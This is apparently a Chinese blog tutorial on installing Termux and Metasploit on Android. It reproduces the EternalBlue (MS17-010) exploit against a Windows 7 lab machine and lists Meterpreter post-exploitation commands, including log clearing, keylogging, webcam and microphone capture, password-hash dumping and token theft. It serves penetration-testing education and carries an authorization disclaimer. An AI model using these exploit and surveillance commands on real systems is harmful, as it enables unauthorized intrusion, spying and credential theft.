安卓Termux安装MSF框架完整教程!MSF命令渗透测试详细教程!附“永恒之蓝”漏洞复现!

简介

Termux

Termux 是一款运行于 Android 系统的开源终端模拟器。该软件提供了 Linux 环境,即使设备不具备 root 权限也可使用。通过自带的包管理器(Pacman、 APT),Termux 可以安装许多现代化的开发和系统维护工具,例如 zsh、Python、Ruby、NodeJS、MySQL 等软件。

Metasploit Framework

Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。 Metasploit项目最为知名的子项目是开源的Metasploit框架,一套针对远程主机进行开发和执行“exploit代码”的工具。其他重要的子项目包括Opcode数据库、shellcode档案、安全研究等内容。 Metasploit项目知名的功能还包括反取证与规避工具,其中的某些工具已经内置在Metasploit Framework里面。

安装Termux

github安装

可以通过Termux的官方github的Release页面进行下载。

Releases · termux/termux-app · GitHub

可以使用最新版本。在展开Assets的三角小箭头,可以看到这里有很多的apk。可以根据自己的需求去选择一个apk安装。

  • arm64-v8a(64位 ARM 处理器):适用于较新的安卓设备,尤其是 64 位 ARM 设备。
  • armeabi-v7a(32位 ARM 处理器):适用于大部分较老的安卓设备。
  • x86(32位 Intel 处理器):适用于少数搭载 Intel 处理器的安卓设备。
  • x86_64(64位 Intel 处理器):适用于较新的搭载 Intel 处理器的安卓设备。
  • universal :这是一个适配所有架构的版本,通常是包含多个架构的 APK,适用于各种设备。

选择安装的 APK

  • 如果你的设备是现代的安卓设备,并且使用的是 ARM 64位处理器,选择 termux-app_v0.118.1+github-debug_arm64-v8a.apk。
  • 如果你的设备是较老的 32位 ARM 设备,可以选择 termux-app_v0.118.1+github-debug_armeabi-v7a.apk。
  • 如果你不确定设备的架构,或者需要支持多个架构,建议选择 termux-app_v0.118.1+github-debug_universal.apk,它是一个通用版本,应该能够在大多数安卓设备上运行。

F-Droid安装

可以通过F-Droid去下载Termux的安装包

https://f-droid.org/en/packages/com.termux/

往下滑,我们可以在下面看到Termux的一些历史版本。最新的版本是0.119.0-beta.1 (1020) ,更新于 2024-06-21。不过我不太建议下载,因为它是一个beta版。可能会有bug或不稳定。

建议下载版本 0.118.1(1000) ,点击下载APK,即可下载安装包。

安装MSF框架

注意Temux内用pkg install命令直接安装的老的方法2021.6.1开始就失效了,国内还有很多小白文原封不动的抄袭老的pkg源直装的办法;根本不能安装成功。

Termux的源中已经移除了对Metasploit的支持,原来命令行直接安装的方法全部失效(据说是因为termux作者,不希望让termux变成脚本小子的黑客工具,于是把msf , sqlmap等包删了)。

在开始安装前建议全程使用挂好代理。

我们打开Termux

我们需要先更新一下Termux。输入以下命令

pkg update && pkg upgrade

提示是否想要继续,直接回车,默认是Y。后面如果遇到提示输入也是直接回车就可以了。这样就算更新完成。

​输入以下命令安装必要的工具和库,提示是否安装按回车即可。

pkg install wget curl git -y

Metasploit 需要 Ruby 环境支持,安装Ruby

pkg install ruby -y

下载源码

git clone https://github.com/gushmazuko/metasploit_in_termux.git

输入ls,可以看到我们已经把源码克隆下来了。

ls

进入这个目录查看一下当前有什么文件。

#进入目录
cd metasploit_in_termux/

#查看当前目录的文件
ls

可以看到这里有个metasploit.sh的文件。我们给这个文件提升权限。

chmod +x metasploit.sh

ls

可以看到这个文件变成绿色的,说明我们提升权限成功了。

输入以下命令开始运行这个文件开始安装msf框架。

./metasploit.sh

这个安装过程极其漫长,请确保你的网络和硬盘空间能够正常工作。如果你怀疑卡了的哈,可以按Ctrl+C停止,然后重新运行命令,开始安装。

经过漫长的等待。如果你出现这个画面。就说明安装成功了。这里我按了一下Ctrl+C停止,然后就出现这个画面。看起来是安装好了。

开始使用

根据终端输出的提示,我们使用命令开始使用Metasploit框架。

msfconsole

我们来测试一下windows 7的"永恒之蓝"漏洞

输入以下命令使用"永恒之蓝"漏洞模块

use exploit/windows/smb/ms17_010_eternalblue

这里我的windows 7靶机的ip地址可以通过cmd命令去查看,可以看到IPv4地址就是windows 7 的ip地址。

#查看ip地址
ipconfig

在msf里面设置好目标靶机的ip地址

set RHOST 192.168.174.141

查看一下模块的设置,确保我们的设置正确无误

show options

从输出中可以看到我们RHOST设置为了目标的靶机ip地址。

接下来就可以开始渗透,输入以下命令开始进行渗透

exploit 或 run

出现这个界面就说明渗透成功。

渗透测试

核心命令

? / help        显示帮助菜单,列出所有命令。

background    将当前会话置于后台运行。

bg        background 的别名。

sessions        查看所有活动会话并切换到指定会话(例如 sessions -i 1 切换到会话1)。

bgkill        终止后台运行的 Meterpreter 脚本。

bglist        列出所有正在运行的后台脚本。

bgrun        在后台运行一个脚本。

channel       显示或控制活动的通道。

close          关闭指定的通道。

detach         分离当前会话(适用于 HTTP/HTTPS)。

disable_unicode_encoding    禁用 Unicode 字符串编码。
enable_unicode_encoding    启用 Unicode 字符串编码。

get_timeouts    显示会话的超时时间设置。

guid    获取当前会话的 GUID(全局唯一标识符)。


info    显示一个 Post 模块的详细信息。
irb    打开 Ruby 交互式命令行,用于开发调试。


load    加载一个或多个扩展模块。
machine_id    获取目标主机的唯一标识符(MSF ID)。

migrate        将会话迁移到另一个进程,通常迁移到系统进程以提高隐蔽性。

将会话进程迁徙到explorer.exe的进程里面去。这个explorer.exe的进程是最常迁徙的进程。当然你也可以迁徙到其他的进程去。

pivot    管理数据包转发(网络流量转发)。
pry    打开 Pry 调试器。


read    从通道读取数据。
resource    执行存储在文件中的命令(批量操作)。

exit / quit     退出当前会话。

run      执行脚本或模块(例如运行后渗透模块)。

secure    重新协商会话的加密协议。


set_timeouts    设置会话的超时时间。
sleep    暂停会话指定的时间后重新连接。
ssl_verify    修改 SSL 证书验证设置。
transport    管理会话的传输机制(如 HTTP、HTTPS、TCP 等)。
uuid    获取当前会话的 UUID(通用唯一识别码)。


write    向通道写入数据。

文件系统命令

cat    显示文件内容。

ls / dir    列出目标系统当前目录下的所有文件和文件夹。


cd <路径>    切换到目标目录。

checksum    计算并返回文件的校验值。


cp    复制文件或目录。


del    删除指定的文件。


download <文件>    从目标主机下载文件到本地。


upload <文件>    将本地文件上传到目标主机。

edit    编辑一个文件。
getlwd    显示本地工作目录。


getwd    显示目标系统的当前工作目录。


lcd    更改本地工作目录。
mkdir    创建新目录。
mv    移动文件或目录。
pwd    显示当前工作目录。


rm <文件>    删除目标主机上的文件。

rmdir    删除目录。
search    搜索目标文件系统中的特定文件。
show_mount    列出所有挂载点或逻辑驱动器。

网络命令

arp    显示目标主机的 ARP 缓存。


getproxy    显示当前代理配置。

ipconfig    查看目标主机的网络接口配置信息(Windows 系统常用)。


ifconfig    查看目标主机的网络接口信息(类 Unix 系统常用)。
netstat    显示目标主机的当前网络连接。


portfwd    端口转发(例如 portfwd add -l 8080 -p 80 -r 192.168.1.2)。

resolve    解析目标主机的主机名或 IP。


route    查看目标主机的路由表。

系统命令

clearev    清除目标主机的事件日志。
drop_token    放弃当前会话中的模拟令牌。
execute    在目标系统上执行指定命令。
getenv    获取目标系统的环境变量值。
getpid    获取当前会话运行的进程 ID。


getprivs    尝试获取当前用户的所有权限。


getsid    获取当前会话的 SID(安全标识符)。


getuid    获取当前用户标识。


kill    终止指定进程。
localtime    显示目标系统的本地时间。
ps    显示目标系统的所有运行进程。


reboot    重启目标主机。
reg    操作目标主机的注册表。
rev2self    撤销当前的模拟身份,返回到初始身份。
shell    启动目标主机的系统命令行界面。


shutdown    关闭目标主机。
steal_token    尝试从目标进程窃取模拟令牌。
sysinfo    显示目标系统的详细信息。

用户界面命令

用于操作目标主机的用户界面,例如键盘、鼠标、桌面等。
enumdesktops    列出所有可访问的桌面和窗口站点。


getdesktop    获取当前桌面。


idletime    显示目标主机用户的空闲时间。


keyboard_send    模拟按键输入。
keyevent    模拟键盘事件。
keyscan_dump    导出键盘记录缓冲区内容。
keyscan_start    开始记录键盘输入。
keyscan_stop    停止记录键盘输入。
screenshare    实时查看目标主机桌面。

用浏览器去打开


screenshot    捕获目标主机的屏幕截图。
setdesktop    更改当前桌面。

摄像头和音频命令

用于操作目标主机的摄像头和音频设备。
record_mic    录制目标主机的麦克风音频。


webcam_chat    启动视频聊天(需要支持)。
webcam_list    列出目标主机的可用摄像头。
webcam_snap    捕获目标主机摄像头快照。
webcam_stream    实时查看目标主机的摄像头视频流。

权限提升和密码操作

用于提权和密码提取。
hashdump    导出 SAM 数据库中的密码哈希值。


getsystem    尝试提升权限到 SYSTEM 用户。
timestomp    修改文件的时间戳。

总结

以上的命令并不是全部的命令,我只是举了一部分。实际在测试时限制很大,推荐使用电脑端的msf框架进行测试。

Metasploit Framework(MSF) 是一个开源的渗透测试框架,由 Rapid7 维护和开发。它是安全研究人员和渗透测试人员用来检测、利用、管理和报告漏洞的最流行的工具之一。Metasploit 提供了一个全面的模块化框架,允许用户轻松执行各种攻击和测试任务。

Metasploit 是一把强大的“双刃剑”,既可用于正当的网络安全研究,也可能被不法分子利用。

在此特别强调,本教程仅在合法授权的情况下进行测试和研究,请勿用于其他用途。未经授权使用此类工具可能会侵犯他人隐私,触犯相关法律,任何因此引发的法律或利益纠纷与本人无关。

欢迎各位大佬,小白来找我交流。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值